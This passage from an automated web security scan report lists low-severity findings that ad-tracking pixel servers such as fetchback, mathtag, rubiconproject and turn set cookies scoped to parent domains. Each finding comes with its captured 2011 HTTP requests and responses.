User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_-pah="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bEELtEtuQAUMg2twd9L78Ckve4PRhn+TnbZZgzQjU6BafW/eRnGpuy0oiVFGmY3Anfh17v9nbyJlC6WkITH1s7atNzA94Byz2ahQWWSkgzSBeq/m5yGRHDBWVE3WQKWx1rq0Os5JD95fxkgtM/XMh8ZPItRGPdDs6DkKTj57w7NLvTrFYiNQkaAQXrvVknibEJ2Q3EEI6f88RHWUnsWlXdsumEcJ4AZQLWPtn8GUbAKtpnD2xZHycOIz+UUUTimvw1mPizedaDoQ3uueOR55nVFaPfwnliNg2DvaGTMKiNaZXNWSnvgXbxjGssTFwevLvWOYWkMVKVnyPJt2uFto8uxRa0p6J53cfm74Hg2akeLDOYR8NEH+Q6UGJLQxN+ehQIy1YbeY76PrG8="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_6axN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNfEOh7gMUVmN+rJTfuGJ3lJ2WIlmH+K4lNWvB9xCh8we5B/vOPodlGvFGW0Z4wA55MvPQcWymIH2JcYlrOwkYsTo9uVScK0Ua4baBot2CPh5UPtUBFRfDxV2qCUT9ijeVsXo0496NoZxE+VT03J2BBs/L705ahQTDFMb9AsF0RDzzS9OyuyEnNSh05TjP5dAXiU0xJ68BrtFi/ZBkUn4jVTkybTRgbgbR9JGbWMf5UNUl8uA=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
Set-Cookie: rtc_okMd=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
Set-Cookie: NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56fa7&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 02:02:15 GMT; Path=/
X-Proc-ms: 263
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 02:02:15 GMT

GIF89a.............!.......,...........D..;

12.51. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3166 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1305510838_11939:638_5512:45450; uid=1_1305510838_1305465388147:4406953890584386; kwd=1_1305510838; sit=1_1305510838_3166:638:638_3167:666:0_1888:45450:45450; cre=1_1305510838; bpd=1_1305510838; apd=1_1305510838; scg=1_1305510838; ppd=1_1305510838; afl=1_1305510838

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305510847_11939:0_5512:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: uid=1_1305510847_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: kwd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: sit=1_1305510847_3166:647:0_3167:675:9_1888:45459:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: cre=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: bpd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: apd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: scg=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: ppd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: afl=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 01:54:07 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #11939 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

12.52. http://pixel.fetchback.com/serve/fb/ver

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/ver

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/ver?uatFilter=false&fb_key=pixel.fetchback.comcat%3D%26name%3Dlanding%26sid%3D3166http%3A%2F%2Fwww.gnc.com%2Fhome%2Findex.jsp%3Frdir%3D1a+%2Fserve%2Ffb%2Fpdc&cat=&sid=3166&name=landing&uid=1302186535420%3A5639073448711300&crv=0.0&oid=Unknown HTTP/1.1
Host: pixel.fetchback.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166
Cookie: cmp=1_1305543176_11939:0; uid=1_1305543176_1302186535420:5639073448711300; kwd=1_1305543176; sit=1_1305543176_3166:0:0_3295:3356641:3354563; cre=1_1305543176; bpd=1_1305543176; apd=1_1305543176; scg=1_1305543176; ppd=1_1305543176; afl=1_1305543176

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:52:57 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1305543177_1302186535420:5639073448711300; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
Set-Cookie: cre=1_1305543177; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 10:52:57 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

12.53. http://pixel.mathtag.com/data/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /data/img

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/img?mt_id=100040&mt_dcid=1305510867 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510843; mt_mop=9:1305510197|1:1305510843

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x785d 30813
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:30 GMT
Location: http://bid.openx.net/cm?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&dst=http://sync.mathtag.com/sync/img%3Fmt_exid%3D5%26mt_exuid%3D4dd07bc8-e97b-118c-3dec-7b8c5c306530
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510870; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:30 GMT
Set-Cookie: mt_mop=1:1305510843|5:1305510870|9:1305510197; domain=.mathtag.com; path=/; expires=Wed, 15-Jun-2011 01:54:30 GMT
Content-Length: 0


12.54. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=102938&mt_adid=100502&v1=&v2=&v3=&s1=&s2=&s3=&ord=627277572 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510197; mt_mop=9:1305510197

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1c77 7287
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:27 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510867; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:27 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

12.55. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5421&nid=2054&put=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2081=AG-00000001389358554; ses2=5032^1; csi2=3179363.js^1^1305508799^1305508799&3158416.js^1^1305508790^1305508790; put_1185=4325897289836481830; cd=false; au=GNQQ9N2W-FJJG-10.204.178.130; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C1%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C0%2C1%2C%2C; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C1%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C1%2C2%2C%2C; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.56. http://pixel.traveladvertising.com/Live/Pixel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Live/Pixel.aspx?PlacementId=49600 HTTP/1.1
Host: pixel.traveladvertising.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: image/gif
Expires: Mon, 16 May 2011 02:02:56 GMT
Last-Modified: Mon, 16 May 2011 02:02:56 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: CookieId=2943716f476840758470c226fe759afb;Path=/;Domain=.traveladvertising.com;Expires=Sun, 08-Feb-2060 02:02:56 GMT
Set-Cookie: CookieDropperDropRetarget_CriteoRT=49600;Path=/;Domain=.traveladvertising.com;Expires=Wed, 15-Jun-2011 02:02:56 GMT
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........L..;

12.57. http://px.steelhousemedia.com/pr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pr?get_px=1&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: checkCookie=success

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=1537f5df-e7b9-46ee-8bec-7f939810aa52;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: tts="...[SNIP]...";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
Set-Cookie: checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
Connection: close


12.58. http://px.steelhousemedia.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /st

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?get_px=1&aid=9056&cb=1305542498385515&ce=1 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: checkCookie=success

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=c056e86d-7ee9-4885-969a-4f3148039040;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: tts="...[SNIP]...";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
Set-Cookie: checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
Connection: close


12.59. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=Z6z3HD7Ka9PFm_lTPlcJyUlQ-yO37BfURcbb7BumEMQAutjTrrs_D_o0Lv3V9pAvJVMIOj2uDziSnc27IJcNQA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=_CLkMkl0RMOD45j0Wsg1NVEsVAWo8oLKT7_oZjnIB4dd6ISB_q_vS5rapRhLZ6kj4SDJo80wBimsrZzphev9ivgHsb4j-oWssmPe5WFHQyURTUDkfjOHZfLNt9GGTnw4Zq6ZC8kiZ22OnHUC32mZqLE5y81TtPnlDGnC6fCswjA; fc=ePsfRpzouzhmWzaxidOOYedzXl_zByxS-dxKMy2bCgGwBKgjtjPFRrKyS70pSqF5MHH7n5N5MkRcXPZr8GbhWr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7C15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7Cundefined%7Cundefined%7C15110; rv=1; uid=4325897289836481830; pf=XgAYABZIGxSt-MC7IipMsd5bNlyEQRkkMhXrkam3PMXl_8wI-IuDElnwKB6wR_ZOUGkSMP8Pn8VAR8TvETdZeEwTo0JKIWMjMJy6tGuW8X1CxpGsLjr_FDSUO6s7DAN-rvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dUnpZvtX7vuT0qUgblStniCyP5ldTxhbfUs-5l57Hel2oSM7wYUtlfyTv5RTafjXWSMZ5CxcluAtg1HjNFrf1cA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
Set-Cookie: pf=qbuRlHr65Kba4HTyrdd5MH3JdGv9GZeYHo7AeFWHp0731R35t8tVFswvyCCUNmQRg2c436_EtLBPbUDtd-MYNmtAckgKwFTyh_sZsdEXBQ1CpT6DcV9IbY-hvpa_KWAErvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dfX6GDuctpcNnRGwBo7rSoxo-nkvo1J3Zd1nNNhXLF9CW1P_6CrTbMkoipJrBwBOyDD0FkxBUi5AYhqoFv0boAuD5cjBNWX99VFn97_13LO4; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=706525&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:56:37 GMT


12.60. http://rya.rockyou.com/ams/ptrck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rya.rockyou.com
Path:   /ams/ptrck.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ams/ptrck.php?code=td9d4f46 HTTP/1.1
Host: rya.rockyou.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.3
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www236.rockyou.com took D=10868 microseconds to serve this request
